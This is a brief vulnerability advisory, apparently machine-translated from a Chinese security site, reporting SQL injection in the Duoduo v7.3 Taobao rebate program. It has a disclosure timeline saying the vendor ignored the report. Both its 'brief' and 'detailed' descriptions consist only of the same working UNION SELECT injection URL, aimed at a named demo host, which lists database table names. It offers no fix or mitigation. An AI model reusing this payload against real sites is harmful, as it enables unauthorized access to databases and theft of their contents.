A lot of the rebate Taobao guest program Duoduo v7. 3 injection vulnerability-vulnerability warning-the black bar safety net

2012-01-30T00:00:00
ID MYHACK58:62201233002
Type myhack58
Reporter 佚名
Modified 2012-01-30T00:00:00

Description

Vulnerability details

Disclosure of status:

2012-01-29: positive contact vendors and wait for manufacturers to claim, details not open to the public

2012-01-29: the vendors have actively ignored vulnerabilities, the details disclosed to the public

Brief description:

http://demo.duoduo123.com/huangou.php?id=-1%20union%20select%201,2,3,group_concat%28table_name%29,5,6,7,8%20from%20information_schema. tables%20where%20table_schema=database%2 8% 2 9 can be injected.

Detailed description:

http://demo.duoduo123.com/huangou.php?id=-1%20union%20select%201,2,3,group_concat%28table_name%29,5,6,7,8%20from%20information_schema. tables%20where%20table_schema=database%2 8% 2 9